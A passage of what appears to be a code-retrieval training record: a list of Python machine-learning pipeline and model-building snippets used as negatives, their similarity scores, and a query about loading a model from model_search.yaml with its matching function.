DuplicatedRowHandle()),\r\n ('discretize', Digitize()),\r\n ('standardize', Standardize()),\r\n ('minmaxscaler', MyMinMaxScaler()),\r\n ('model', GaussianNB())])\r\n pipe_8 = Pipeline([('missing', MissingValueHandle()),\r\n ('duplicated', DuplicatedRowHandle()),\r\n ('discretize', Digitize()),\r\n ('standardize', Standardize()),\r\n ('minmaxscaler', MyMinMaxScaler()),\r\n ('model', SVC(gamma='auto'))])\r\n pipe_dict = {0: 'LogisticRegression',\r\n 1: 'KNeighborsClassifier',\r\n 2: 'RandomForestClassifier',\r\n 3: 'SGDClassifier',\r\n 4: 'MLPClassifier',\r\n 5: 'GradientBoostingClassifier',\r\n 6: 'GaussianNB',\r\n 7: 'SVC'}\r\n\r\n # List of pipelines\r\n pipelines = [pipe_1, pipe_2, pipe_3, pipe_4, pipe_5, pipe_6, pipe_7, pipe_8]\r\n\r\n # Fit the pipelines\r\n for pipe in pipelines:\r\n pipe.fit(x_df, train_df[config.target])\r\n\r\n # Is there outlier\r\n outlier_bool = is_outlier(x_df)\r\n\r\n corr_df = x_df.corr()\r\n\r\n # Open new file\r\n result_path = './test_eval/Result_params_' +\\\r\n str(config.filename.split(\"/\")[-1].split(\".\")[0]) + '.txt'\r\n result_file = open(result_path, 'w')\r\n result_file.write(\"Filename: \" + str(config.filename) + '\\n')\r\n result_file.write(\"Target: \" + str(config.target) + '\\n')\r\n if regression:\r\n result_file.write(\"Prediction type: Regression\" + '\\n')\r\n else:\r\n result_file.write(\"Prediction type: Classification\" + '\\n')\r\n result_file.write(\"Test size: \" + str(config.test_size*100) + \"%\" + '\\n')\r\n result_file.write(\"Model input columns: \" + str(input_vars) + '\\n')\r\n result_file.write(\"Used preparations: \" + '\\n')\r\n if config.missing_bool:\r\n result_file.write(\"Missing value handle (\" +\r\n str(config. missing_value_handle) +\r\n \"), \")\r\n if config.min_scaler_bool:\r\n result_file.write(\"Min scaling, \")\r\n if config.standardize_bool:\r\n result_file.write(\"Standardize, \")\r\n if config.to_dummies:\r\n result_file.write(\"To dummies\")\r\n result_file.write('\\n' + \"Discretize columns: \" +\r\n str(config.discretize) + '\\n')\r\n result_file.write(\"Binary columns: \" + str(is_binary_list) + '\\n')\r\n result_file.write(\"Unary columns: \" + str(is_unary_list) + '\\n')\r\n result_file.write(\"Time columns: \" + str(is_time_list) + '\\n')\r\n if outlier_bool:\r\n result_file.write(\"There is outlier in the data.\" + '\\n')\r\n\r\n # Evaluation\r\n result_df = pd.DataFrame()\r\n result_cols = []\r\n for idx, val in enumerate(pipelines):\r\n result_df = pd.concat([result_df,\r\n my_evaluation(val.predict(test_df[input_vars]),\r\n test_df[config.target])])\r\n result_cols.append(pipe_dict[idx])\r\n\r\n result_df.index = result_cols\r\n result_file.close()\r\n\r\n with pd.ExcelWriter(\"./test_eval/Evaluation_\"\r\n + str(config.filename.split(\"/\")[-1].split(\".\")[0])\r\n + \".xlsx\") as writer:\r\n if regression:\r\n result_df.to_excel(writer, sheet_name=\"Regression\")\r\n else:\r\n result_df.to_excel(writer, sheet_name=\"Classification\")\r\n corr_df.to_excel(writer, sheet_name=\"Correlation\")", "def model_pipeline(catnums):\n pipe = make_pipeline(\n Imputer(strategy='most_frequent'),\n OneHotEncoder(categorical_features=catnums, sparse=False),\n PolynomialFeatures(),\n Ridge(alpha=25)\n )\n return pipe", "def build_model():\n #\n pipeline = Pipeline([\n ('features', FeatureUnion([\n ('text_pipeline', Pipeline([('vect', CountVectorizer(tokenizer=tokenize)),('tfidf', TfidfTransformer())])),\n ('starting_verb', StartingVerbExtractor())])),\n ('clf', RandomForestClassifier())\n ])\n \n # hyerparameters for grid to search within\n# parameters = [{'clf__bootstrap': [False, True],\n# 'clf__bootstrap': [False, True],\n# 'clf__n_estimators': [80,90, 100, 110, 130],\n# 'clf__max_features': [0.6, 0.65, 0.7, 0.73, 0.7500000000000001, 0.78, 0.8],\n# 'clf__min_samples_leaf': [10, 12, 14],\n# 'clf__min_samples_split': [3, 5, 7]\n# }\n# ]\n\n parameters = {\n 'features__text_pipeline__vect__ngram_range': ((1, 1), (1, 2)),\n 'features__text_pipeline__vect__max_df': (0.5, 0.75, 1.0),\n 'features__text_pipeline__vect__max_features': (None, 5000, 10000),\n 'features__text_pipeline__tfidf__use_idf': (True, False),\n 'clf__n_estimators': [50, 80, 90, 100, 200],\n 'clf__min_samples_split': [2, 3, 4, 5, 7],\n 'features__transformer_weights': (\n {'text_pipeline': 1, 'starting_verb': 0.5},\n {'text_pipeline': 0.5, 'starting_verb': 1},\n {'text_pipeline': 0.8, 'starting_verb': 1},\n )\n }\n\n\n # Final model ready to be applied on dataset\n model = GridSearchCV(pipeline, param_grid=parameters)\n \n return model", "def build_model(): \n \n \n pipeline = Pipeline([('vect', CountVectorizer(tokenizer=tokenize)),('tfidf', TfidfTransformer()),\n ('MLC', MultiOutputClassifier(KNeighborsClassifier()))])\n \n parameters = {'MLC__estimator__n_neighbors': [3,5],'MLC__estimator__leaf_size':[10,20,30] }\n custom_recall = make_scorer(recall_score,average='weighted')\n\n cv = GridSearchCV(pipeline, param_grid = parameters, n_jobs = -1, verbose=2)\n\n\n return cv", "def build_model():\n # build pipeline with count vecotrizer, tfidf and support vector machine\n pipeline_SVC = Pipeline([\n ('vect', CountVectorizer(tokenizer = tokenize)),\n ('tfidf', TfidfTransformer()),\n ('multi-clf', MultiOutputClassifier(LinearSVC()))\n ])\n\n # define parameters for gridsearch\n parameters_SVC = {\n 'vect__max_df': (.6, 1),\n 'tfidf__norm': ('l1', 'l2'),\n 'multi-clf__estimator__C': (.1, 1, 100)\n }\n\n # build parameter grid and fit data\n model = GridSearchCV(pipeline_SVC, parameters_SVC)\n\n return model", "def get_cb_pipeline(train):\n from src.features import alchemy_feat, counting_feat, nltk_feat\n features = [\n ('sentiment', alchemy_feat.Sentiment()),\n ('sent_len', counting_feat.SentenceLength()),\n ('tfidf', counting_feat.BagOfTfIDF(train)),\n ('ner', alchemy_feat.NER()),\n ('pos', nltk_feat.POS())\n ]\n return get_pipeline(features)", "def _create_pipeline(self) -> codepipeline.Pipeline:\n source_output = codepipeline.Artifact()\n build_output = codepipeline.Artifact()\n return codepipeline.Pipeline(\n self,\n 'Pipeline',\n stages=[\n self._create_source_stage('Source', source_output),\n # self._create_image_build_stage(\n # 'Build', source_output, build_output),\n # self._create_deploy_stage('Deploy', build_output)\n ]\n )", "def build_model():\n pipeline = Pipeline([\n ('vect', CountVectorizer(tokenizer = tokenize, min_df = 5)),\n ('tfidf', TfidfTransformer(use_idf = True)),\n ('clf', MultiOutputClassifier(RandomForestClassifier(n_estimators = 10,\n min_samples_split = 10)))\n ])\n\n # Create parameters dictionary\n parameters = {'vect__min_df': [1, 5],\n 'tfidf__use_idf':[True, False],\n 'clf__estimator__n_estimators':[10, 25],\n 'clf__estimator__min_samples_split':[2, 5, 10]}\n\n # create grid search\n cv = GridSearchCV(pipeline, param_grid=parameters)\n\n return cv", "def get_preprocessing_model(image_size):\n\n expected_image_size = (160, 320, 3)\n\n if image_size != expected_image_size:\n raise ValueError(\"Expected image size is {}, but {} was given\".format(expected_image_size, image_size))\n\n input = keras.layers.Input(shape=image_size)\n x = get_preprocessing_pipeline(input)\n\n model = keras.models.Model(input=input, output=x)\n return model", "def __init__(self):\n # self.model = get_pretrained_model()\n self.tokenizer = get_tokenizer()\n self.model = transformers.Trainer(model=get_pretrained_model())\n self.summarizer = pipeline(\"summarization\") # ~1.2 GB download the first time this is run.", "def build_model():\n # Pipeline of CountVextorizer, TfdifTransformer and MultiOutputClassifier\n pipeline = Pipeline([\n ('vect', CountVectorizer(tokenizer=tokenize)),\n ('tfidf', TfidfTransformer()),\n ('clf', MultiOutputClassifier(RandomForestClassifier()))\n ])\n \n parameters = {'clf__estimator__n_estimators': [50, 30],\n 'clf__estimator__min_samples_split': [3, 2] \n }\n \n cv = GridSearchCV(pipeline, param_grid= parameters, verbose=2, n_jobs=4)\n return cv", "def __build_ml_pipeline(self, clf: MultiOutputClassifier) -> Pipeline:\r\n pipeline = Pipeline([\r\n ('features', FeatureUnion(\r\n [('text', Pipeline(\r\n [('text_field_extractor', \r\n basic_utils.TextFieldExtractor('message')), \r\n #('vect', CountVectorizer(tokenizer=clean_text)),\r\n #('tfidf', TfidfTransformer())\r\n ('tfidf', TfidfVectorizer(tokenizer=basic_utils.tokenize, \r\n min_df=.0025, max_df=0.25, \r\n ngram_range=(1,2)))\r\n ])),\r\n \r\n ('numerics', FeatureUnion(\r\n [('text_len', \r\n Pipeline([('text_len_extractor', \r\n basic_utils.NumericFieldExtractor('text_len')), \r\n ('text_len_scaler', StandardScaler())\r\n ])),\r\n ('punt_perc', \r\n Pipeline([('punt_perc_extractor', \r\n basic_utils.NumericFieldExtractor('punt_perc')), \r\n ('punt_perc_scaler', StandardScaler())\r\n ]))\r\n ])),\r\n ('starting_verb', basic_utils.PosFieldExtractor('starting_verb_flag'))\r\n ])),\r\n \r\n ('clf', clf)\r\n ])\r\n \r\n return pipeline", "def main_modeling_pipeline():\n\n\n data_df = pd.read_csv('gs://aiplatformfilipegracio2020/head_train_data.csv')\n data_df = data_df[[LABEL, 'price', 'days_on_site']]\n\n class_weights = calculate_class_weights(data_df[LABEL])\n print('class weights', class_weights)\n logging.info('Data loaded and processed')\n train_ds, val_ds, test_ds = make_tf_datasets(data_df, LABEL)\n logging.info('Tensorflow datasets created')\n\n with strategy.scope():\n logging.info('Inside strategy')\n simple_feature_layer = make_simple_feature_layer(data_df)\n logging.info('Going to make model')\n simple_model = make_simple_model(simple_feature_layer)\n\n logging.info('Going fit model')\n simple_model_results, simple_model = model_fit_and_evaluate(model=simple_model,\n train_ds=train_ds,\n val_ds=val_ds,\n test_ds=test_ds,\n class_weights=class_weights,\n epochs=TRAINING_EPOCHS,\n job_name='simple_model')\n\n simple_model.save('gs://aiplatformfilipegracio2020/')", "def build_model():\n pipeline = Pipeline([\n ('vect', CountVectorizer(tokenizer=tokenize)),\n ('tfidf', TfidfTransformer()),\n ('clf', MultiOutputClassifier(LogisticRegression(random_state=2020), n_jobs=-1))\n ])\n\n parameters = {\n 'clf__estimator__C': [1, 2, 4],\n 'clf__estimator__penalty': ['l1', 'l2']\n }\n\n cv = GridSearchCV(pipeline, param_grid=parameters, cv=5)\n\n return cv", "def spacy_pipeline() -> spacy.language.Language:\n context = get_spacy_pipeline()\n assert context is not None\n return context", "def get_model():\r\n model = Sequential([\r\n\r\n Lambda(normalize, input_shape=(66, 200, 3)),\r\n\r\n Convolution2D(16, (3, 3), padding='same', activation='relu', strides=2),\r\n Convolution2D(16, (3, 3), padding='same', activation='relu', strides=1),\r\n Convolution2D(24, (3, 3), padding='same', activation='relu', strides=1),\r\n MaxPooling2D(pool_size=(3, 3)),\r\n\r\n Convolution2D(24, (3, 3), padding='same', activation='relu', strides=1),\r\n Convolution2D(32, (3, 3), padding='same', activation='relu', strides=1),\r\n MaxPooling2D(pool_size=(3, 3)),\r\n\r\n Convolution2D(32, (3, 3), padding='same', activation='relu', strides=1),\r\n Convolution2D(48, (3, 3), padding='same', activation='relu', strides=1),\r\n MaxPooling2D(pool_size=(3, 3)),\r\n\r\n Convolution2D(48, (3, 3), padding='same', activation='relu', strides=1),\r\n Convolution2D(32, (3, 3), padding='same', activation='relu', strides=1),\r\n Convolution2D(24, (3, 3), padding='same', activation='relu', strides=2),\r\n Convolution2D(1, (3, 3), padding='same', activation='relu', strides=2),\r\n Flatten(),\r\n\r\n\r\n ])\r\n\r\n model.compile(optimizer='adam', loss='mse', metrics=['accuracy'])\r\n return model", "def read(cls):\n return PipelineJavaMLReader(cls, \"com.ibm.analytics.wml.pipeline.spark.MLPipeline\")", "def export_pipeline(scikit_pipeline):\n steps_obj = {'steps':[]}\n for name, md in scikit_pipeline.steps:\n steps_obj['steps'].append({\n 'name': name,\n 'class_name': fullname(md),\n 'params': md.get_params()\n })\n\n return steps_obj", "def model_pipeline_run(index, model, params, X_train, y_train, X_test, y_test, model_name, pre_process_time, type):\n n_jobs = -1\n n_iter = 100\n if model is None:\n return\n try:\n row = {\"dataset_index\": index}\n if type == \"classification\":\n steps = [(\"classifier\", model)]\n else:\n steps = [(\"regressor\", model)]\n pipeline = MLPipeline(steps=steps)\n if type == \"classification\":\n if model_name == \"rf\":\n params[\"classifier__max_features\"] = [min([x, X_train.shape[1]]) for x in\n params[\"classifier__max_features\"]]\n elif \"dl\" in model_name:\n n_jobs = None\n params[\"classifier__shape\"] = [X_train.shape[1]]\n if isinstance(y_test[0], (str)):\n try:\n y_train = np.asarray(list(map(lambda x: int(re.search(\"[0-9]+\", x).group()), y_train)))\n y_test = np.asarray(list(map(lambda x: int(re.search(\"[0-9]+\", x).group()), y_test)))\n except Exception as e:\n le = LabelEncoder()\n y_train = le.fit_transform(y_train)\n y_test = le.transform(y_test)\n grid = RandomizedSearchCV(estimator=pipeline, param_distributions=params, cv=KFold(3), refit=True,\n verbose=0, n_jobs=n_jobs, n_iter=n_iter,\n scoring=\"f1\" if len(set(y_train)) == 2 else \"f1_weighted\")\n else:\n if model_name == \"rf\":\n params[\"regressor__max_features\"] = [min([x, X_train.shape[1]]) for x in\n params[\"regressor__max_features\"]]\n elif \"dl\" in model_name:\n n_jobs = None\n params[\"regressor__shape\"] = [X_train.shape[1]]\n grid = RandomizedSearchCV(estimator=pipeline, param_distributions=params, cv=KFold(3), refit=True,\n verbose=0, n_jobs=n_jobs, n_iter=n_iter, error_score=np.nan)\n model_time = time.time()\n columns = X_train.columns\n if \"dl-rnn\" in model_name:\n X_train = np.reshape(X_train.astype(\"float32\").values, (X_train.shape[0], 1, X_train.shape[1]))\n X_test = np.reshape(X_test.astype(\"float32\").values, (X_test.shape[0], 1, X_test.shape[1]))\n else:\n X_train = X_train.astype(\"float32\").values\n X_test = X_test.astype(\"float32\").values\n grid = grid.fit(X_train.astype(\"float32\"), y_train)\n row[\"time\"] = (time.time() - model_time) / 60\n row[\"pre_process_time\"] = pre_process_time\n return scoring(grid, X_train, X_test, y_train, y_test, columns, row=row, model_name=model_name, type=type)\n except Exception as e:\n print(e)", "def pipeline(self):\n return stanza.Pipeline(dir=TEST_MODELS_DIR, processors=\"tokenize,ner\", package={\"ner\": [\"ncbi_disease\", \"ontonotes\"]})", "def create_pipelines_lingspam():\n stop = ('stop', StopWordRemovalTransformer())\n lemma = ('lemma', LemmatizeTransformer())\n binz = ('binarizer', CountVectorizer())\n we = ('document embedding', DocEmbeddingVectorizer())\n sel = ('fsel', SelectKBest(score_func=mutual_info_classif, k=100))\n clf = ('cls', BernoulliNB()) # Binary features in the original paper. \n return Pipeline([binz, sel, clf]), \\\n Pipeline([stop, binz, sel, clf]), \\\n Pipeline([lemma, binz, sel, clf]), \\\n Pipeline([stop, lemma, binz, sel, clf]), \\\n Pipeline([stop, lemma, we, sel, clf])", "def _make_pipeline(preprocessors, classifier):\n if isinstance(preprocessors, list):\n # support only preprocessing of lenght 2\n return make_pipeline(preprocessors[0], preprocessors[1], classifier)\n if preprocessors is None:\n return make_pipeline(classifier)\n\n return make_pipeline(preprocessors, classifier)", "def run(self):\n self.pipeline = self.set_pipeline()\n self.pipeline.fit(self.X,self.y)\n return self", "def build_model():\n \n pipelineRFC = Pipeline([('vect', CountVectorizer(tokenizer=tokenize)),\n ('tfidf', TfidfTransformer()),\n ('clf', MultiOutputClassifier(RandomForestClassifier()))])\n \n param = {\n 'clf__estimator__n_estimators': [10, 50]\n }\n \n gscv = GridSearchCV(pipelineRFC, param_grid=param, verbose=15)\n return gscv", "def pipeline(self):\n steps = [('DummyDefense', DummyDefense()),\n ('DummyClassifier', DummyClassifier())]\n return Pipeline(steps)", "def s2s_model(self):\r\n \r\n model = AttentionSeq2Seq(input_dim=self.input_dim, input_length=self.input_len, \r\n hidden_dim=16, output_length=self.output_len, \r\n output_dim=self.output_dim, depth=(1,1),\r\n stateful=False, dropout=0.5)\r\n model.compile(loss='mape', optimizer='adam', metrics=['mse'])\r\n model.fit(self.train_X, self.train_Y, epochs=75, verbose=2, shuffle=True)\r\n\r\n return model", "def get_model(summary=False):\n\timage_input=Input(shape=(220,220,5),name='image_input')\n\tbranch1_conv1=Conv2D(64, kernel_size=(3, 3), border_mode='same', input_shape=(220,220,5), activation='relu')(image_input)\n\tbranch1_conv2=Conv2D(64, kernel_size=(1, 1), border_mode='same', activation='relu')(branch1_conv1)\t\n\tbranch1_pool1=MaxPooling2D(pool_size=(3, 3), strides=(2, 2))(branch1_conv1)\n\tbranch2_conv1=Conv2D(128, kernel_size=(3, 3), border_mode='same', activation='relu')(branch1_pool1)\n\tbranch2_conv2=Conv2D(128, kernel_size=(1, 1), border_mode='same', activation='relu')(branch2_conv1)\t\n\tbranch2_pool1=MaxPooling2D(pool_size=(3, 3), strides=(2, 2))(branch2_conv2)\n\tbranch3_conv1=Conv2D(128, kernel_size=(3, 3), border_mode='same', activation='relu')(branch2_pool1)\n\tbranch3_conv2=Conv2D(128, kernel_size=(1, 1), border_mode='same', activation='relu')(branch3_conv1)\t\n\tbranch3_pool1=MaxPooling2D(pool_size=(3, 3), strides=(2, 2))(branch3_conv2)\n\tbranch4_conv1=Conv2D(128, kernel_size=(3, 3), border_mode='same', activation='relu')(branch3_pool1)\n\tbranch4_conv2=Conv2D(128, kernel_size=(1, 1), border_mode='same', activation='relu')(branch4_conv1)\t\n\tbranch4_pool1=MaxPooling2D(pool_size=(3, 3), strides=(2, 2))(branch4_conv2)\n\tbranch5_conv1=Conv2D(128, kernel_size=(3, 3), border_mode='same', activation='relu')(branch4_pool1)\n\tbranch5_conv2=Conv2D(128, kernel_size=(1, 1), border_mode='same', activation='relu')(branch5_conv1)\t\n\tbranch5_pool1=MaxPooling2D(pool_size=(3, 3), strides=(2, 2))(branch5_conv2)\n\tbranch6_conv1=Conv2D(128, kernel_size=(3, 3), border_mode='same', activation='relu')(branch5_pool1)\n\tbranch6_conv2=Conv2D(128, kernel_size=(1, 1), border_mode='same', activation='relu')(branch6_conv1)\t\n\tbranch6_pool1=MaxPooling2D(pool_size=(3, 3), strides=(2, 2))(branch6_conv2)\n\tbranch1_flat=Flatten()(branch6_pool1)\n\tdrop=Dropout(.3)(branch1_flat)\n\t# FC layers group\n\tdense1=Dense(512, activation='relu', name='fc1')(drop)\n\tdrop1=Dropout(.3)(dense1)\n\tdense2=Dense(256, activation='relu', name='fc2')(drop1)\n\tdrop3=Dropout(.3)(dense2)\n\tout=Dense(2, activation='softmax', name='fc4')(drop3)\n\tmodel=Model(inputs=image_input,outputs=out)\n\treturn model", "def pipeline(self):\n predicted, real = self.surface_segmentation()\n # print(predicted[0:10])\n # print(len(predicted))\n test_file = \"../morphology/\" + self.language + \"/\" + self.language + \".clean.test.conll\"\n input_file = open(os.path.join(sys.path[0], test_file), 'r')\n segmented_words = []\n\n # Only one entry per word for dictionary\n\n words = []\n labels = []\n for line in input_file.readlines():\n tmp = line.rstrip('\\n').split(\" | \")[0]\n label_arr = line.rstrip('\\n').split(\" | \")[2]\n label_arr = get_labels(label_arr)\n if tmp not in words:\n words.append(tmp)\n labels.append(label_arr)\n\n segmented_words = []\n for word, label in zip(words, predicted):\n tmp = []\n for i in range(len(label)):\n if label[i] == \"S\" or label[i] == \"E\":\n tmp.append(word[i])\n tmp.append(\"-\")\n else:\n tmp.append(word[i])\n tmp = \"\".join(tmp).rstrip(\"-\")\n segmented_words.append(tmp)\n\n features = surface_labelled_data_preparation_pipeline(segmented_words)\n predicted, test = self.__surface_labelled_segmentation_pipeline(features)\n return predicted, labels", "def create_model(self):\r\n model = self.model_fn(self.flags)\r\n print(model)\r\n return model", "def _pipeline(self, vectorizer, n_features, ngram_range, C):\n classifier = SVC(kernel=\"linear\", C=C, max_iter=1000000, shrinking=1, tol=0.0001)\n vectorizer.set_params(stop_words=None, max_features=self.max_features, ngram_range=ngram_range)\n \n checker_pipeline = Pipeline([\n ('vectorizer', vectorizer),\n ('reduce_dim', SelectKBest(chi2, k=n_features)),\n ('classify', classifier)])\n\n return checker_pipeline" ]
[ "0.62133336", "0.619528", "0.6192642", "0.6129727", "0.60924697", "0.60888034", "0.60504484", "0.59715533", "0.59501135", "0.5866584", "0.58635634", "0.5856176", "0.57757", "0.5774506", "0.5752574", "0.5752574", "0.5741443", "0.5726265", "0.5723943", "0.5714648", "0.57145613", "0.5708808", "0.5668033", "0.56536686", "0.5649134", "0.5647488", "0.56460094", "0.56338537", "0.56114775", "0.5608913", "0.5587885", "0.5586228", "0.5573341", "0.55610096", "0.5551505", "0.5538759", "0.5538214", "0.5538214", "0.5522836", "0.55221957", "0.5510209", "0.5509636", "0.5507337", "0.55068356", "0.5503484", "0.5501202", "0.54995537", "0.5490917", "0.5476767", "0.54657876", "0.54601514", "0.5457365", "0.54506356", "0.54441607", "0.54375184", "0.5431834", "0.54136336", "0.54114294", "0.54016984", "0.5398169", "0.53939414", "0.53783596", "0.53783596", "0.536577", "0.53626204", "0.5342835", "0.53339523", "0.5333814", "0.53189003", "0.53188294", "0.5309592", "0.5307904", "0.5303339", "0.53029984", "0.5293686", "0.52923054", "0.5290182", "0.52798885", "0.52794534", "0.52762806", "0.526934", "0.5266564", "0.5251469", "0.52510023", "0.52486825", "0.52482706", "0.52479917", "0.52441686", "0.5243538", "0.5235079", "0.5234209", "0.5231744", "0.52274525", "0.5225956", "0.52231324", "0.522182", "0.5212851", "0.5206044", "0.52043307", "0.5203128", "0.5185338" ]
0.0
-1
return a model as defines in model_search.yaml
def get_model_from_yaml(name): filename = pkg_resources.resource_filename('empirical_lsm', 'data/model_search.yaml') with open(filename) as f: model_dict = yaml.load(f)[name] return get_model_from_dict(model_dict)
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_model(model=gin.REQUIRED):\n return model", "def get_model(*args):\n return Model()", "def get_model(model):\n all_models = cmd.get_object_list()\n\n if len(all_models) == 0:\n logging.parser_error('No models are opened.')\n return\n\n model = model.lower()\n\n if model and (model in all_models):\n return model\n\n if len(all_models) > 1:\n logging.parser_error(\"Please specify which model you want to use. {}\".format(all_models))\n return\n\n return all_models[0]", "def get_model(params):\r\n module_name, class_name = params.model.name.rsplit('.', 1)\r\n i = importlib.import_module(module_name)\r\n return getattr(i, class_name)", "def get_model(model_name):\n module_name = 'strain.models.strain_' + model_name.lower()\n model_module = importlib.import_module(module_name)\n obj = getattr(model_module, model_name)\n return obj", "def get_model_definition(request):\n modelname = request.matchdict['modelname']\n results = db_model_definition(request.db)[modelname]\n for result in results:\n return result.value\n raise NotFound(\"Unknown model %s\" % modelname)", "def model(self) -> Type[Model]:", "def model() -> Model:\n return Model()", "def get_model_by_name(cls, name):\n model_name = inflection.camelize(name) # class name of the model to use\n model = cls.models[model_name]\n return model", "def get_model(*, name: str) -> typing.Optional[typing.Type]:\n return getattr(open_alchemy.models, name, None)", "def model(self) -> 'outputs.ModelDefinitionResponse':\n return pulumi.get(self, \"model\")", "def model(self):\n return MODELS.get(self._model,self._model)", "def get_model(self):\n raise NotImplementedError(\n \"You must provide a 'get_model' method for the '%r' index.\" % self\n )", "def _get_card_model(self, model: str) -> Any:\n return self.collection.models.byName(model)", "def get_model():\n return UNISAL", "def get_model(name, **model_args):\n module = importlib.import_module('.' + name, 'models')\n return module.build_model(**model_args)", "def search_model():\n search_condition = request.stream.read()\n try:\n search_condition = json.loads(search_condition if search_condition else \"{}\")\n except Exception:\n raise ParamValueError(\"Json data parse failed.\")\n\n model_lineage_info = _get_lineage_info(\n lineage_type=\"model\",\n search_condition=search_condition\n )\n\n return jsonify(model_lineage_info)", "def get_model(self, name):\n bundle_name, model_name = name.split(\".\")\n bundle = self.bundles[bundle_name]\n model = bundle.models[name]\n return model", "def retrieve_model(self, model_name):\n\t\tmodel_detail = dbop.get_model(self, model_name)\n\t\t#since the 'owner' field of model_detail is only owner's username,\n\t\t#we have to change it to a User object\n\t\t#In this case, the owner of this model is the user itself\n\t\tmodel_detail['owner'] = self\n\t\tif model_detail['model_type'] == 'SPSS Predictive Model':\n\t\t\treturn model.SPSSModel(**model_detail)\n\t\telif model_detail['model_type'] == 'DashDB In-database Model':\n\t\t\treturn model.DashdbModel(**model_detail)", "def get_model(self, key: str = None, **kwargs) -> Dict:\n raise NotImplementedError", "def get_model(self):\n return self.model", "def get_model(self):\n return self.model", "def get_model(self):\n return self.model", "def get_model(self):\n return self.model", "def get_model(self):\n return self.model", "def get_model(self):\n return self.model", "def get_model(self):\n return self.model", "def get_model(self):\n return self.model", "def get_model(self):\n return self.model", "def get_model(self):\n return self.model", "def model_class(self):\n model_name = self.model_name()\n\n if not model_name:\n return None\n\n try:\n (app, mdl) = model_name.strip().split('.')\n except ValueError:\n logger.error(f\"Invalid 'model' parameter for setting {self.key} : '{model_name}'\")\n return None\n\n app_models = apps.all_models.get(app, None)\n\n if app_models is None:\n logger.error(f\"Error retrieving model class '{model_name}' for setting '{self.key}' - no app named '{app}'\")\n return None\n\n model = app_models.get(mdl, None)\n\n if model is None:\n logger.error(f\"Error retrieving model class '{model_name}' for setting '{self.key}' - no model named '{mdl}'\")\n return None\n\n # Looks like we have found a model!\n return model", "def find_model_using_name(model_name):\n model_filename = \"models.\" + model_name + \"_model\"\n modellib = importlib.import_module(model_filename)\n model = None\n target_model_name = model_name.replace('_', '') + 'model'\n for name, cls in modellib.__dict__.items():\n if name.lower() == target_model_name.lower() \\\n and issubclass(cls, BaseModel):\n model = cls\n\n if model is None:\n print(\"In %s.py, there should be a subclass of BaseModel with class name that matches %s in lowercase.\" % (model_filename, target_model_name))\n exit(0)\n\n return model", "def model(self) -> str:\n ...", "def load_model(self) -> Any:", "def get_model(recipe, **overrides):\n\n # \"model\", \"stages__*__model\"\n if isinstance(overrides, dict):\n recipe = {**recipe, **overrides} # override parameters\n\n return get_instance(**recipe) # expand (shallow copy)", "def default_model():\n return \"teenytweetynet\"", "def get_model(self) -> BaseLanguageModel:\n model = available_models[self.model_name.value]\n kwargs = model._lc_kwargs\n secrets = {secret: getattr(model, secret) for secret in model.lc_secrets.keys()}\n kwargs.update(secrets)\n\n model_kwargs = kwargs.get(\"model_kwargs\", {})\n for attr, value in self.dict().items():\n if attr == \"model_name\":\n # Skip model_name\n continue\n if hasattr(model, attr):\n # If the model has the attribute, add it to kwargs\n kwargs[attr] = value\n else:\n # Otherwise, add it to model_kwargs (necessary for chat models)\n model_kwargs[attr] = value\n kwargs[\"model_kwargs\"] = model_kwargs\n\n # Initialize a copy of the model using the config\n model = model.__class__(**kwargs)\n return model", "def get_model_reference(self, model_name):\n\n print_debug(\"Geting model :\" + model_name)\n model = ModelsFactory.get(model_name=model_name)\n return model", "def get_model(config):\n if not isinstance(config, ModelConfig):\n raise ValueError(\"Get model must be a config file. \")\n\n identifier = str(config.class_id).lower()\n if identifier in ['vgg', 'vgg16', 'vgg19']:\n return vgg.get_model(config)\n elif identifier in ['resnet', 'resnet50',]:\n return resnet.get_model(config)", "def model(self):\n return self.model_", "def get_model(self):\n # just return the first model, since all replicas are the same\n return self.call_async(0, '_async_get_model').gen()", "def model():\n global _cached_model\n if _cached_model:\n return _cached_model\n model = models.Root(os.path.join(app.root_path, '..'))\n if not app.config['DEBUG']:\n _cached_model = model\n return model", "def get_model(self):\n return Doc()", "def get_model():\n global model\n if model is None:\n model = AppModel()\n model.load_resources()\n return model", "def get_search_dao(self):\n if hasattr(self, 'search_model'):\n return self.search_model()\n raise NotImplementedError()", "def model(self) -> Model:\n return self.software_system.get_model()", "def real_model(request):\n return request.config.option.real_model", "def model(self):", "def model(self):", "def model(self):", "def model(self):", "def model(self):", "def get_model(self):\n\t\treturn self.object.__class__", "def search_doc_type(self):\n return self._meta.model_name", "def model(self):\n return self.__model", "def _get_model_by_name(self):\n \n # Interpret the request data based on the expected row and column structure\n row_template = ['strData']\n col_headers = ['model_name']\n \n # Create a Pandas Data Frame for the request data\n self.request_df = utils.request_df(self.request, row_template, col_headers)\n \n # Initialize the persistent model\n self.model = PersistentModel()\n \n # Get the model name from the request dataframe\n self.model.name = self.request_df.loc[0, 'model_name']\n \n # Get the model from cache or disk\n self._get_model()\n \n # Debug information is printed to the terminal and logs if the paramater debug = true\n if self.model.debug:\n self._print_log(3)", "def build_model(cfg, **kwargs):\n name = cfg.name\n return MODEL_REGISTRY.get(name)(cfg=cfg, **kwargs)", "def get_model_by_name(self, model_name):\n models = ModelDirectory.get_model_by_name(model_name, pipeline=self)\n return models", "def model(self) -> Optional[str]:\n return pulumi.get(self, \"model\")", "def get_model(model_name: str, *args, **kwargs):\n try:\n if '.' in model_name:\n module_name, class_name = model_name.rsplit('.', 1)\n else:\n module_name = model_name\n class_name = model_name.capitalize().replace(\"_\",\"\")\n\n model_module = import_module('.' + module_name, package='models')\n\n model_class = getattr(model_module, class_name)\n\n instance = model_class(*args, **kwargs)\n\n except (AttributeError, ModuleNotFoundError):\n raise ImportError('{} is not part of our model/architecture collection.'.format(model_name))\n else:\n if not issubclass(model_class, Model):\n raise ImportError(\"{} is not a valid model/architecture.\".format(model_class))\n\n return instance", "def load_model_from_catalog(name, as_builder=False):\n return catalog.get_model_from_catalog(name, as_builder=as_builder)", "def get_model(name):\n # Evil reflection\n model_name = name.lower()\n model_module = importlib.import_module('.'+model_name, cfg.model_pck)\n [(_, model_class)] = inspect.getmembers(\n model_module,\n lambda c: inspect.isclass(c) and sys.modules[c.__module__] == model_module)\n\n tf.logging.debug('Found class %s', model_class)\n return model_class", "def get_model(self):\n return QueryS", "def get_model(self):\n return self._model", "def get_model(self):\n return self._model", "def get_model(name):\n\n try:\n from .model_defs import get_model_from_def\n model = get_model_from_def(name)\n logger.info(\"Model {n} loaded from model_defs module\".format(n=name))\n except 